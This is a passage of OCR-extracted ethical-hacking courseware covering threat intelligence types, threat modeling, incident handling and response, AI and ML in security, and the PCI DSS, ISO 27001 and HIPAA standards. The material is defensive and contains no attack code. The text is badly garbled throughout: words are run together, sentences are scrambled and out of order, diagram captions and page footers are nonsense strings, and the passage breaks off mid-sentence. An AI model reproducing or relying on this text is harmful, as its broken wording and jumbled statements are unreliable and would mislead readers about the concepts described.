posture,threats,detailsaboutthefinancialimpactof various cyberactivities,attack
trends,andthe impactof high-level
business
decisions.Thisinformationis consumed by
the high-levelexecutivesandmanagement oftheorganization, suchas IT management
andCISO.It helps the management to identify current cyber risks,
unknownfuture risks,
threatgroups,and attributionof breaches. The intelligence obtainedprovides a risk
basedview that mainly focuseson high-level concepts of risksandtheir probability. It
mainly dealswith long-term issues and provides real-timealertsfor threats to the
organization's critical assets,such as IT infrastructure, employees, customers,and
applications,Thisintelligence is usedbythe management to makestrategic business
decisionsand to analyze their effect.Basedon the analysis, the management can
allocatesufficientbudget andstaffto protectcriticalT assetsandbusiness processes.
Strategicthreatintelligence is generally i n theformof a report that mainly focuses on
high-levelbusiness strategies. Sincethe characteristic of strategicthreat intelligenceis
preeminent,the datacollectionalsorelatesto high-levelsources and requireshighly
skilledprofessionals
to extract information.Thisintelligence
is collectedfrom sources
suchas OSINT,CTI vendors,andISAOsandISACs.
threat intelligence
Thestrategic helps identify
organizations any similarpastincidents,
their intentions,and any attributesthat mightidentify
the attacking
adversaries,
why
the organization is withinthe scopeof the attack,
majorattacktrends,
andhow to
reducethe risklevel.
Generally, includesthe following
threatintelligence
strategic information:
©. Thefinancialimpactof cyber
activity
© Attribution forintrusions anddatabreaches

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Threatactorsandattacktrends
threatlandscape
‘The for various industry
sectors
Statisticalinformationon databreaches,
datatheft,andmalware
>

Geopolitical
conflicts
various involving
on howadversary
Information TTPs change
cyberattacks
over time

Industry
sectorsthat might
impactdueto high-level
business
decisions

Tacticalthreat intelligence playsa major role i n protectingthe resources of the

organization. It provides informationrelated to the TTPsused bythreat actors
{attackers)to perform attacks.Tacticalthreat intelligence
is consumed bycybersecurity
professionals suchas IT service managers,security operations managers,network
operations center (NOC) staff,administrators, andarchitects.It helps
the cybersecurity
professionals understand howtheadversaries are expectedto perform their attackon
the organization,identifythe informationleakage fromthe organization,andassess the
technical capabilities
and goals of the attackers alongwith the attackvectors.Using
tactical threat intelligence, securitypersonnel develop detection and mitigation
strategies beforehandthrough procedures such as updating products
security with
identifiedindicatorsandpatching vulnerablesystems
The collection sources for tactical threat intelligence
include campaign reports,
malware, incidentreports, attackgroupreports, andhumanintelligence, amongother
information.Thisintelligence is generally
obtainedbyreading white or technicalpapers,
‘communicatingwithotherorganizations, or purchasingintelligence
fromthirdparties. It
includeshighly technicalinformationon topicssuchas malware, campaigns,techniques,
andtoolsin theformof forensicreports.
Tacticalthreatintelligence providesday-to-day operational
supportbyhelping analysts
incidentsrelatedto events,investigations,
security
assess various andother activities. It
alsoguides
the high-level
executives of the organizations
i n making
strategicbusiness
decisions.
Operational
ThreatIntelligence
Operational
threat intelligence
provides
informationabout specific
threatsagainst
the
It provides
organization. contextualinformationaboutsecurity
events andincidentsthat
helpdefenders disclose potential risks,providegreaterinsightinto attacker
methodologies, identifypast maliciousactivities, and performinvestigations on
maliciousactivityi n a more efficientway. It is consumed bysecurity managers or heads
of incidentresponse,networkdefenders, security and frauddetectionteams.
forensics,
It helps organizations to understandthe possible threat actors and their intention,
andopportunity
capability, to attackvulnerableIT assetsandthe impact of a successful
attack. In many cases, onlygovernment organizationscan collect this typeof
intelligence.
However, doing s o helps
IRandforensic teamsto deploy security assetsto

ical andCountermensores
Mackin ©by E-Comel
Copyright
identify
andstopupcomingattacks, improveearly-stage
attackdetecting
capability,
and
damage
reducean attack’s to ITassets.
Operationalthreat intelligenceis generally
collectedfrom sources suchas humans,
socialmedia, andchatrooms; it mayandalsobecollectedfromthe real-worldactivities
and events that result i n cyberattacks.
Operationalthreat intelligence
is obtainedby
analyzing humanbehavior, threat groups,and bysimilarmeans. Thisinformationhelps
to predict future attacksand thus enhancesincidentresponseplans and mitigation
strategies.Operational threat intelligencegenerally
appearsas a reportthat contains
identified maliciousactivities, recommendedcourses of action, and warningsof
emerging
attacks.
TechnicalThreatIntelligence
Technicalthreat intelligenceprovides informationabout resources an attackeruses to
perform an attack;thisincludescommand andcontrolchannels, tools,andotheritems.
It hasa shorterlifespancompared to tacticalthreatintelligenceandmainly focuseson a

specificoC. It providesrapiddistributionand response to threats.For example,a piece

of malwareusedto perform an attackis tacticalthreat intelligence, whereasthe details
relatedto the specific implementation of the malwarecome undertechnicalthreat
intelligence.Other examples of technicalthreat intelligence includethe specific IP
addresses anddomainsusedbymaliciousendpoints, phishing emailheaders, andhash
checksums of malware, amongothers.Technical threat intelligenceis consumed bySOC
staffandIRteams.
Theindicators of technicalthreat intelligence
are collected from active campaigns,
attacksthat are performed or datafeedsprovided
on other organizations, byexternal
Theseindicatorsa re generally
third parties. collected
as partof investigations
of attacks
performed Thisinformationhelps
on various organizations. securityprofessionals add
the identifiedindicatorsto the defensivesystems suchas IDS and IPS,firewalls, and
endpoint securitysystems, thereby enhancing the detectionmechanisms used to
identifythe attacksat an early
stage. It alsohelpsthemidentifymalicioustrafficandIP
addresses suspected of spreading malwareandspamemails.Thisintelligence is directly
fed into the security devicesi n digitalformat to black and identify
inboundand
malicious
‘outbound trafficenteringthe organization’s
network,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ThreatModeling
CEH
Threatmodeling3 sk assessmentapproach Foranalysing
the secur ofan apoliatonbycapturing,
organising,
allthe information
and analyzing thataffect the sect ofan application

ModelingProcess
‘Threat

on
apt
Secwry
Master
needs
tobe aps to determine effort
h ow much puttowardsubseqentsteps

02 TION | aeniy te comsonents,

dataows and rust Bound

03) Pesemessette
|

04 den
threat | ety
ren relearttothecontroseario
Shtanedinsens
ands and contr ws the ifrmation

05 ete ae weaknesses
Memtity r elate tothe
threats
vulnerabiity
categories
foundusing

Threat Modeling
Threatmodeling is a risk assessmentapproachfor analyzing
the security of an application
by
capturing,organizing,andanalyzingalltheinformationthataffectsit. Thethreatmodelconsists
of three majorbuilding blocks:understanding
the adversary'sperspective, characterizing
the
security
of
the system,
documented
progresses.
and determining
threats.
Every
application
shouldhavea developed
threatmodelthat shouldberevisitedas the application
and
evolvesanddevelopment

Threatmodeling helps to:

+
Identify
relevantthreatsto a particularapplication
scenario
+
Identify
key vulnerabilities
i n an application's
design
+

Improve
security
design
Whenusingthis approach, shouldkeep
an administrator the following
i n mind:

+
Trynot to be rigidabout specific stepsor implementations; focuson the
instead,
approach. If any stepbecomesimpassable, go rightto step4 of the threat modeling
processandidentify theproblem.
Usescenariosto scopethe modeling
activity.
Useexistingdesign documents.Useitems likedocumenteduse cases or use stories,
architecturaldiagrams,
dataflow diagrams,
Startwith a whiteboardbeforecapturing
or
information
other
design
documentation.
i n documents
or gettinglost in
details.It may be helpful
to use a digital
camera with printingcapabilities
to document
anddistribute theinformationfromthewhiteboard.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Usean iterative approach. Addmore detailsand improvethe threat modelas design
and development continue. Thiswill helpwith becoming familiarwith the modeling
processanddeveloping the threatmodelto betterexamine more possiblescenarios
Obtaininputabout the hostand network constraints from the systemand network
administrators,To better understandthe end-to-enddeployment diagram, obtain as
muchinformationas possible abouthost configurations, firewall policies,
allowed
protocolsandports,andotherrelevantdetails.
Thethreatmodeling involvesfivesteps:
process
1. Identify Objectives
Security
Security
objectivesare the goalsand constraints related to the application's
confidentiality, and availability.
integrity, Security-specific
objectivesguidethe threat
modeling
efforts and helpto determinehow mucheffort needsto be put toward
subsequentsteps.To identifysecurity objectives,
administratorsshould ask the
following
questions:
© Whatdatashouldbe protected?
© Arethereany compliance
requirements?
© qualty-of
Are therespecific service requirements?
© Are thereintangible
assetsto protect?
.

Application
Overview
Identify data flows,
the components, and trust boundaries.To draw the end-to-end
deployment
scenario, the administrator First,theyshould
shoulduse a whiteboard.
draw a rough diagramthat explains
the workings
and structure of the application,
its
subsystems, and its deployment The deployment
characteristics. diagram should
contain the following
© deployment
End-to-end topology
Logical
layers
Key
components
Keyservices
portsand protocols
Communication
Identities
Externaldependencies
Identify
Roles
Theadministratorshouldidentify
people and the rolesand actions theycan perform
within the application. are there higher-privileged
For example, groupsof users?Who
can readdata?Whocan updatedata?
Who
can deletedata?

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Identify
KeyUsage
Scenarios
Theadministratorshoulduse the application’s
usecasesto determineits objective.
Use
explain
‘cases howthe applicationis usedandmisused.

Identify
Technologies
and keyfeaturesof the software,
Theadministratorshouldlistthe technologies as well
as the following
technologiesi n use

Operating
systems
Web
server
Database
software
server software

Technologies business,
for presentation, anddataaccess layers
©
Developmentlanguages
Identifying technologies
these helps on technology-specific
to focus threats.
Identify
Application Mechanisms
Security
Theadministratorshouldidentify
some key
pointsregarding
the following:
©. Input
anddatavalidation
© Authorizationandauthentication
©.
Sensitive
data
Configuration
management
Session
management
Parameter
manipulation
Cryptography
Exception management
‘Auditing
andlogging
Theseeffortsai m to identify
relevantdetailsand to adddetailswhererequired,
or to
identify
areas

Decompose
thatrequiremore.
the Application
In this step,the administratorbreaksdown the application to identifythe trust
boundaries, data flows,
entrypoints,and exit points.Doing
so makesit considerably
easier to find

Identify
more
and
relevant
TrustBoundaries
more detailedthreatsandvulnerabilities.

Identifyingthe application’s
trust boundarieshelps the administrator to focuson the
relevanta reasof the application.
It indicateswheretrust levelschange.
© Identify boundaries
outer system

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Identify or key
accesscontrolpoints whereaccessrequiresextra privileges
places or
role membership
>

Identify
Identify
trust boundaries
DataFlows
from a dataflow perspective

Theadministratorshouldlist the application's data inputfrom entryto exit. Thishelps

to understandhowthe application communicateswith outsidesystems andclientsand
howthe internalcomponents interact. Theyshouldpayparticularattention to the data
flow across trust boundaries andthe datavalidationat the trust boundary entrypoint.A
good approach is to start at the highest levelandthendeconstructthe application by
testingthedataflowbetweendifferentsubsystems.

Identify
Entry Points
application's
The entrypointcan also serve as an entrypointfor attacks.All users
interact with the application
at these entrypoints.Other internal entrypoints
uncoveredbysubcomponents over the layers
oftheapplicationmaybepresent onlyto
supportinternal communication with other components. The administratorshould
identify
theseentrypointsto determinethe methodsusedbyan intruder to get i n
throughthem. They shouldfocuson the entrypointsthat allow access to critical
adequate
functionalitiesandprovide defensefor them.
Identify
ExitPoints
Theadministratorshouldalsoidentify thepointswherethe applicationtransfers
datato
the client or external systems.They should prioritize
the exit pointsat whichthe
application clientinputor datafromuntrustedsources,suchas a
writes datacontaining
shareddatabase
|.

Identifyidentify
Threats
Theadministrator should threatsrelevantto the controlscenario and context
using the informationobtainedi n the application
overview and decompose application
of the development
steps.Theyshouldbringmembers andtest teams together
to
identify
potential
threats.Theteam shouldstart with a list of common threatsgrouped
bytheirapplication
vulnerability Thisstepusesa question-driven
category. approach
to
helpidentify
threats.

5.Identify
A
Vulnerabilities

vulnerability is a weaknessi n an application

(deployed i n a n informationsystem)
that
allows attacker exploitation, therebyleadingto securitybreaches. Security
shouldidentify
administrators any weaknessesrelatedto the threatsfound usingthe
vulnerability
categoriesto identifyingvulnerabilitiesand fix them beforehand to keep
intrudersaway.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
Incident Management CEH
iaset
(8 Incidentmanagement
of to analyze,
plore,
defined
resolve
incidents
ent,
processes and security

IncidentManagement
Vulnerability
Handling InedentHandling

Artifact
Handling
rn aotDarcie

[irae] Fed

Incident Management
Incidentmanagement is a set of definedprocesses to identify,
analyze, prioritize,and resolve
incidentsto restore the system
security as soon as possible,
to normalservice operations and
prevent recurrence of the incident. It involvesnot onlyresponding to incidentsbut also
triggeringalertsto preventpotential administratormust identify
risksand threats.A security
softwarethat is open to attacksbeforesomeone takesadvantage of the vulnerabilities.

includes
the
following:
Incidentmanagement
+

Vulnerability
analysis
+

+
Artifact
Security
awareness
analysis
training
+
Intrusiondetection
+

‘The
monitoring
Publicor technology
incidentmanagement is designed
process to:
+

+
Improve
service
problems
Resolve
quality
proactively
+

+
Reduce

Meet incidents
organization
the impact
of

availabilty
service
onan

requirements
or its business

+
staffefficiency
Increase andproductivity
user andcustomer satisfaction
Improve
Assisti n handling
futureincidents

ical andCountermensores
Mackin ©by E-Comel
Copyright
Conducting
trainingsessionsto spread
awarenessamongusersis an important partof incident
Suchsessions helpend-usersto recognize suspiciousevents or incidentseasily
management.
andreporta n attacker's
behaviorto theappropriateauthority,
Thefollowing peopleperform
incidentmanagement activities:
=
Human resources personnel take stepsto fire employees
suspected
of harmful

computer
activities
The legalcounsel sets the rulesand regulations Theserules can
in an organization.
influencethe internal securitypolicies
and practicesof the organization
i n case an

or
an organization’s
insider
or
malicious
activities.
attackerusesthe
Thefirewallmanagerkeeps
system
filtersin place.
forharmful
Thesefiltersare frequently
wheredenial-of-
service attacksare made.

An outsourced
service provider
repairssystems infected byviruses andmalware,
Incident responseis one of the functions performed i n incident handling.In turn, incident
handling of
is one the services provided
illustratesthe relationship
‘management.
as partof incidentmanagement. Thefollowing
betweenincident response,incident handling,
diagram
and incident

Incident
Management

Vulnerability
Handling. IncidentHandling

[ Aetifact
Handling J

Announcements
=. Analysis 7
So]
Figure
1.4:lock Diagram
of Incident
Man

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Incident Handling
and Response

Steps
involvedinthe IHAR proces

@Preparation © cscaion

©seen cordingandAsigment

—
©
Q
recovery

ern

@rerern fmt
2 ——e
©viene ctheringnd
Forensic
Anata niet Oadonee

Incident Handling
and Response
Incident handling and response (IH&R) is the process of taking organized and carefulsteps
whenreacting to a security incidentor cyberattack. It is a set of procedures, actions,and
measures taken against an unexpected event occurrence. It involveslogging, recording,and
resolvingincidents thattakeplace i n the organization. It notesthe incident, whenit occurred,
and its cause. Itis the practice
its impact, of managingtheincidentresponseprocesses, suchas
preparation,detection, containment,eradication, and recovery,to overcome the impactof an
incidentquickly and efficiently. IH&Rprocesses are important to provide a focusedapproach
for restoring
normalbusinessoperations as quickly as possible after an incidentand with a
minimalimpacton the business.
The IH&R process involvesdefining u ser policies,
developing protocols,
buildingincident
responseteams, auditing organizational assets,planning incident responseprocedures,
obtainingmanagement approval,incidentreporting, and managingresponse.It
prioritization,
alsoincludesestablishing
proper communication betweenthe individualsresponding to an
themto detect,analyze,
incidentandguiding contain,recover, andpreventincidents.
Discussed
beloware the stepsinvolvedi n the IH&Rprocess:
=

1:
StepPreparation
phase
The preparation includesperforming
an audit of resources and assets to
determinethe purposeof security and definethe rules,
policies,
and procedures that
drivethe IH&Rprocess. It alsoincludesbuildingandtraining
an incident response team,
definingincidentreadiness procedures,andgathering required toolsas well as training
the employees to secure
their systemsandaccounts,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Step Recording
2: Incident andAssignment
In this phase, and recording
the initial reporting of the incidenttake place.
Thisphase
handles identifying an incidentanddefining properincident communication plans for
the employees and alsoincludescommunication methodsthat involve informing IT
supportpersonnel or submittingan appropriate ticket.
Step3:
Incident
Triage
In this phase, the identifiedsecurityincidentsare analyzed, validated, categorized,and
prioritized.TheIH&Rteam further analyzes the compromised deviceto find incident
details such as the type of attack,its severity,target,impact,and methodof
propagation, andany vulnerabilitiesit exploited,
Step 4: Notification
In the notification phase, the IH&R team informsvarious stakeholders, including
management, third-party vendors,andclients, aboutthe identified incident.
Step 5: Containment
Thisphase helps to preventthe spread of infectionto other organizational assets,
preventing additionaldamage.
Step 6: Evidence Gathering andForensicAnalysis
In this phase, the IH&Rteam accumulates all possible evidencerelatedto the incident
andsubmitsit to the forensic department for investigation. Forensicanalysis of an
incidentrevealsdetailssuchas the methodof attack,vulnerabilitiesexploited, security
mechanisms averted, networkdevices infected, andapplications compromised.
7:
Step Eradication
In the eradicationphase, the IH&Rteam removes or eliminatesthe root cause of the
incidentandclosesallthe
Step 8: Recovery
attack
vectors to prevent similarincidentsi n the future,

After eliminating the causes for the incidents,the IH&Rteam restores the affected
systems, services,resources, anddata through recovery.It is the responsibility of the
incidentresponse team to ensure that that the incidentcauses no disruption to the
services
Step
or oforganization.
businessthe
9: Post-Incident
Activities
Oncethe processis complete, the securityincidentrequiresadditionalreview and
analysisbeforeclosingthe matter. Conductinga final review is an important
stepi n the
IH&Rprocess that includes:

©
documentation
© Incident

Incident
impactassessment
©
and
Reviewingrevising policies
the
Closinginvestigation
Incident
disclosure

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Roleof Al and ML in CyberSecurity 413
H

Learning
‘Machine

Unsupervised
Learning Supervised Learning

Role of Al and ML in CyberSecurity

(Cont'd)
The cyber
securty
setto exceed
2024,
marets
$300 billon by
andtheA-relatedcyber
[Atin
Cyber
Security Marke,byRegion
(USD
Billion)

a to
securtymarketf spredicted
reach valueof $38.2 billion

by
2026,

08
Module 62
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 Roleof Al and ML in CyberSecurity
(Cont'd)
STEP
413
H
ARTIFICAL
‘CYBERSECURITY'SNEXT MAP:
MARKET
t CBinsets,a longside
‘According i COMPANIES
SECURING
THEFUTURE
WITH INTELLIGENCE

to offernovel
solutions

to
cyber
threats
the
{emerging
byleveraging

‘cybersecurity
isthefourth most
active industry
thatdealswith
companies applying
Al

(@:

Role of
AIandML in Cyber
Machinelearning
Security
(ML)andArtifical Intelligence
(Al)are now popularly
usedacross various
and applications
industries dueto the increase i n computing and
power, data collection,
capabilities.
storage
‘Along
with technological advancements i n Al,suchas self-driving
cars, language
translators,
andbigdata,thereis alsoa rise in threatssuchas ransomware, botnets,
malware,andphishing,
UsingAl andML in cybersecurity
helpsto identifynew exploits
and weaknesses,whichcan be
easily
analyzed furtherattacks.
to mitigate It reducesthepressure professionals
o n security and
alertsthemwhenevera n action is needed.

What
are Al andML?

intelligence only
Artificial is the solutionto defendnetworks thevarious attacks
against that an
antivirus scan cannot detect.A hugeamount of collecteddata is fed into the Al, which
processesandanalyzes it to understand i ts detailsandtrends.
ML is a branchof artificialintelligence (Al)that givesthe systemsthe ability to self-learn
without any explicit
programs. Thisself-learning systemis usedto define what the normal
network, along with its devices, lookslike,andthen uses this to backtrack andreportany
deviationsor anomaliesi n real-time.
techniques:
Thereare two typesof ML classification
‘=
Supervised
Learning
Supervised learning that inputa set oflabeledtrainingdatato attempt
usesalgorithms
betweenthe given labels.Supervised
to learnthe differences learning is furtherdivided
into two subcategories,
namely,
classification
andregression.Classification
includes

ical andCountermensores
Mackin ©by E-Comel
Copyright
 dividedclasses.
completely Its main taskis to definethe test sampleto identify
its class.
Regression
is usedwhen data classes a re not separated, suchas when the data is
continuous,
Unsupervised Learning
Unsupervised learning makesuse of algorithms that inputunlabeledtrainingdata to
attemptto deduce without guidance.
all the categories Unsupervisedlearning
is further
divided into two subcategories, namely, clusteringand dimensionality
reduction
Clusteringdividesthedatainto clusters regardless
basedon theirsimilarities, ofclass
information. Dimensionality reduction is the processof reducing the dimensions
(attributes)
WhyAl andML?
of
data,
Source:https://www.gartner.com,
https://www.marketsandmarkets.com
threat landscape
Thesecurity but,more importantly,
continues to evolvenot just i n scale, in
sophistication.
Despite a range of advancements i n the industry to safeguardagainst
Increasingly
bold and intricate threats,organizations have struggled to keeppace with the
technologies
andtechniques employed byattackers,
As companiescontinue to increase their digital
footprints,
“identify
anddiagnose―
capabilities
are not enough to remediateagainstthis growing fundamentalbusinesschallenge for
of all shapes
organizations andsizes. The development analytics
of advancedsecurity is an
importantconsiderationfor organizations lookingto implement machinelearning
to defend
an arrayofinternal
against andexternalsecurity threats.
securitymarketis set to exceed$300billion by2024,and the Al-relatedcyber
The cyber
security to reacha valueof $38.2
marketis predicted billionby2026.
AI in Cyber
Security
Market,byRegion
(USDBillion)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 andML Application
‘Al Areas
Source:https://www.cbinsights.com
According
to CB Insights,
alongside
overall rising investment activity,many cybersecurity
companies to cyber
a re emergingto offernovelsolutions threatsbyleveraging
the advantages
of artificialintelligence
(Al)
Accordingto CB Insights’ cybersecurity
Al DealsTracker, is the fourth most active industry
for
dealsto
companies
cybersecurity Insights’
data, private
applying
companie
Al. AsperCB
that are usingAl,categorized
thereare over 80
into the nine main areas i n whichtheyoperate:
in

'*
Anti-fraudandidentity management Cyber-risk management
=

=
Mobile
Predictive
intelligence App
security
security =

=
loTsecurity

and security
Behavioralanalytics anomaly
detection
"Deception

Automatedsecurity
jm CYBERSECURITY’S
NEXTSTEP
MARKET
MAP:
1FRAUD
ANTI
80+COMPANIES

MANAGEMENT
SECURING
& IDENTITY
THEFUTURE
WITHARTIFICIAL
INTELLIGENCE
MoBILESECURITY
AGAR feeazoi
rane Hc askyming

Blew —_
Bente crowe auainy

Bomanos science
watt sn
.
2Soeure
2 oem

PREDICTIVE
INTELLIGENCE
8
soanoeat
avomaty

Peopovont
wuunes:
cevecron
:
i
AUTOMATED CYBER-RISK
SecuRiTY
eer
MANAGEMENT

o
ceetnet | = Orne Steptoe

|ge —
| Ziaveun CÂ¥toro
OX Braystax
oranuwe

DECEPTION
Seconiry

Bostile CWO ov
© CBINSIGHTS

Module
08 72
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
 HowDo Al and ML PreventCyber
Attacks?

EE rssworrotecton
and
authentication
Td ecw
secty
Phishing and Prevention
Detection AbasedAntivirus

ThreatDetection Fraud
Detection

Vulnerabity
Management BotnetDetection

Behavioral
Analyte ‘toCombat
Al Theats

How DoAI andML PreventCyber Attacks?

Artificial Intelligence
(Al),andwith it, MachineLearning
(ML),is an emerging technology
i n the
fieldof cybersecurity. It is widelyadopted bylargescale
industriessuchas automation, IT
manufacturing,
services, production,
andfinance.Al plays
a crucialrole in detecting
imminent
cyber
threatsbyincorporating
machine learning
as a subset.

waysthatAl andML safeguard

are different
Following industriesfromcybersecurity
attacks:
=
Password
ProtectionandAuthentication
Passwordcredentialsplaya critical role in preventingillegitimate
access to the
organization's
or user'sdata.If credentialsare compromised,
the reputationof the
or person couldbe damaged.
organization Sometimes, traditionalfacedetectionand
otherbiometric
securitym easurescan alsobevulnerableto thesecredentialbreaches.
Programmersuse Al to improvebiometricvalidationsandface recognition to thwart
suchattacks.Al provides the latest modelsfor recognizingan individual'sface by
tracking
keycorrelationsandpatterns,
Phishing
DetectionandPrevention
Phishing
is a common to sendtheir payloads
methodattackersemploy via emails.The
majorityof userscannot figure
out whichreceivedemailshavea malicious
attachment
orpayload.
In this case,Al andML couldplay role i n identifying
a pivotal andpreventing
suchphishing
attacks.They c an scan and identifyphishing emailsmuchfasterthan a
humanbeingc an. Theycan alsoquickly differentiatemaliciouswebsitesfromlegitimate
websites

ical andCountermensores
Mackin ©by E-Comel
Copyright
ThreatDetection
Machine learning assists companiesin detecting cyber-attacks
before systemsa re
compromised.Being a partof Al,machinelearning
constantlykeeps adminsnotifiedof
imminent cyberthreatsbycarryingout logicaldata analysis.
ML allowssystems to run
its algorithms
upon the data being then performs
received, deeplearning on the and
comprehends the advancements requiredto ensure the safety of the information
systems.
Vulnerability
Management
Al andML-based systems never allowvulnerability to exist for long;
theydynamically
scan for all typesof vulnerabilitiesandalertthe adminsbeforethe system is exploited.
They can alsoprovide theattacker's informationandthe patternsusedto perform the
attack.TheseAl- andML-basedsystems can alsoforecasthowandwhena vulnerability
exploitation
might
occur.

Analytics
Behavioral
‘Anothernotablesecurity
improvement byartificialintelligence Analytics.―
is “Behavioral
Attackers who havestolenthe credentials of a legitimateuser can perform malicious
activities on the organization’s
network; suchattemptsare difficult to detect and

Al softwareinstantly
regular usage.
ML
thwart. Here,Al with generates specific user patterns basedon their regular
alertsthe adminif it detectsanysuspicious usage.
activityor deviationin

NetworkSecurity
Two significant
factorsof network securityare generating
comprehensive
security
policies network topology.
and mappingan enterprise's Unfortunately,
both of these
factorsare time-consuming. Therefore,
administrators Al to enhance
are adopting this
operation;it can carry out the networktraffic analysis
and propose efficientsecurity
policies
bydefault.
Al-basedAntivirus
Traditionalantivirus toolsperformfile scanningon the organization's
networksto check
if any signatures match thoseof knownviruses or malware. Theissuewith this is that
antivirus tools must be updated when the user wants to scan for new malwareor
viruses. Updating is time-consuming,andnew deployment oftentakesa certain amount
of time, To overcome theseissues,organizations employ Al-basedantiviruses,whichuse
anomaly detection to understandprograms’ behavior.Al-basedantivirus detects
suspicious programbehaviorinsteadof matching signaturesforviruses.
FraudDetection
Al and ML algorithms carry out anomaly detectionto identify
payment inconsistencies
andfraudulenttransactions. Theyalso perform automatedpatterndiscovery across
different transactions. ML can easilydifferentiatebetweenauthenticand illegitimate
transactionsandblocks fraudulent
transactions.

ical andCountermensores
Mackin ©by E-Comel
Copyright
BotnetDetection
Botnets can bypass the Instruction Detection System (IDS)by leveraging its
ineffectivenessi n matching
signatures.Botnets can be embeddedusing a highly
sophisticatedcodethat makesthemuntraceablebytraditionalIDSimplementations.
Hence, security use Al and ML algorithms
professionals that alert aboutthe suspicious
behaviorof a networkanddetectunauthorizedintrusions.
Al to CombatAl Threats
Attackerscan also leverage Al technology to maketheir way into an organization's
network;suchcyber threatsmust bedetectedimmediately. Al softwarec an detect
such
imminent Al-augmented attacksbeforethe networkis compromised.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow
CEH
@ Berman
= sce
© mcrsng
concente
EthicalHacking Information
Security Security
Information

x mKQ
Information Laws and Standards
Security
Lawsare a systemof rules and guidelines that are enforced bya particular countryor
community to govern behavior.A Standardis a “document establishedbyconsensus and
approvedbya recognized body that provides, forcommon and repeated guidelines,
use, rules,
for activities or their results,
or characteristics aimed at the achievementof the optimum
degreeof orderin a given context.― Thissection dealswith the various lawsand standards
dealing
withinformationsecurity i n differentcountries.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
Card Industry
Payment DataSecurity
Standard(PCIDSS)
CEH
tat Secunty standard
for
cards
(©T hePayment nds
caré Data tandord(PSS) 2 proprietaryinformation
security
orzanantonehandle
ardor for majordebt,ced, prep, epee, ATM, indPOS
information

PCKData SecurityStandard —

HighLevel Overview

CardIndustry
Payment Standard(PCIDSS)
Data Security
Source:https://www.pcisecuritystandards.org
‘The
Payment Card Industry Data Security Standard(PCIDSS) is a proprietaryinformation
security standardfor organizations that handlecardholderinformation for the majordebit,
credit,prepaid,e-purse, ATM,and POScards.Thisstandardoffersrobustand comprehensive
standardsand supporting materials to enhancepayment carddatasecurity. Thesematerials
includea frameworkof specifications, tools,measurements, and supportresources to help
organizationsensure thesafehandling ofcardholder information.PCIDSSapplies to all entities
involvedin payment cardprocessing,including merchants, processors,acquirers, issuers,and
service providers,
as well as all otherentities that store,process or transmit cardholder data
PCIDSS comprisesa minimum set of requirements for protectingcardholderdata.ThePayment
Card Industry (PCI)Security StandardsCouncilhas developed and maintains a high-level
overview of PCIDSS requirements.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Table1.3:Tableshowing Standard—High
thePCIDataSecurity LevelOverview

Failure
to meet PCIDSSrequirements
mayresulti n finesor the termination of payment-card
processingprivileges.

08
Module 78
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 ISO/IEC27001:2013
CEH
“©
species
soytec27001:2013 forestablishing,
the requirements
information securitymanagement
implementing. nd contnaly improving
maintaining,
withinthe cntet af theorganization
system

of°)
to besutableforseveralferenttypes we, nuding

cary
rerementsandobjeaiver managomentprcenie

Ls with of norton
ompance
thin ezaizaons to ensure Inpeasttion butte enalig

procsses ‘ovntermation
secur customers

ISO/IEC27001:2013
Source:https://www.iso.org
ISO/IEC the requirementsfor establishing,
27001:2013specifies implementing,
maintaining,
andcontinuallyimprovingan information
securitymanagementsystem withinthe context ofan
It includesrequirements
organization. for the assessmentand treatment of information
riskstailoredto theneedsofthe organization,
security
regulation
‘The is intendedto besuitableforseveraldifferentuses,including:
Use within organizations to formulatesecurityrequirements andobjectives
=
Usewithin organizations way to
as a ensure risksare cost-effectively
that security
managed
to ensure compliance
Usewithin organizations with lawsandregulations
Defining
new information
security
management processes
Identifying
andclarifying information
existing security
management
processes
oforganizations
Usebythe management to determinethe status ofinformation
management
security activities
Implementing
business-enabling
informationsecurity
Usebyorganizations
to provide
relevant information
aboutinformationsecurityto
customers

ical andCountermensores
Mackin ©by E-Comel
Copyright
 j
Health InsurancePortability
and Accountability
Act (HIPAA)
CEH
lectrnleTeansuctlon Roques very provider
who
dvs towne
th
same
beet
cre
businessactoicaly

Hale
Security
the of
Use to ensure confer, itr, on valoity health
electoral protected

TRequrernenta
that transactions
umber ent them tached to standard

Provides thestandards
for enforcing
athe Res
AdminstzationSimpfeaton

Health InsurancePortability Act (HIPAA)

andAccountability
Source:https://www-hhs.gov
‘The
HIPAA Privacy Ruleprovides federal protections for the individuallyidentifiablehealth
Informationheldbycovered entities andtheir business associatesandgivespatients a n arrayof
rights
to that information.A t the same time,the Privacy Rulepermits the disclosure of health
informationneeded forpatientcare andother necessary purposes.
The Security Rulespecifiesa series of administrative, physical,and technicalsafeguards for
coveredentities andtheir business associatesto use to ensure the confidentiality,
integrity, and

electronically
availability
of
Theofficeof civil rights
protected
implemented
healthinformation,
AdministrativeSimplification
HIPAA’s Statuteand Rules,
asdiscussed
below:
=

Electronic
Transactions
Transactions
andCodeSetStandards
are electronicexchanges involvingthe transferof informationbetween
partiesfor specific
‘two purposes. TheHealthInsurance Portability and Accountability
of 1996 (HIPAA)
‘Act designated certain typesof organizations as coveredentities,
including healthplans,healthcare clearinghouses, andcertain healthcare providers. In
the HIPAAregulations, the Secretary of Healthand HumanServices(HHS) adopted
certain standardtransactions for the ElectronicData Interchange (EDI)
of health care
data. These transactions are claimsand encounter information, paymentand
remittance advice,claimstatus,eligibility,enrollmentand disenrollment, referralsand
authorizations, coordinationof benefits, and premiumpayment. Under HIPAA, if a
coveredentityelectronically conductso ne of the adopted theymust use
transactions,
the adopted standard—eitherfrom ASC,X12N,or NCPDP(forcertain pharmacy

ical andCountermensores
Mackin ©by E-Comel
Copyright
transactions).
Coveredentities must adhereto thecontent andformatrequirements
of
eachtransaction. Everyprovider
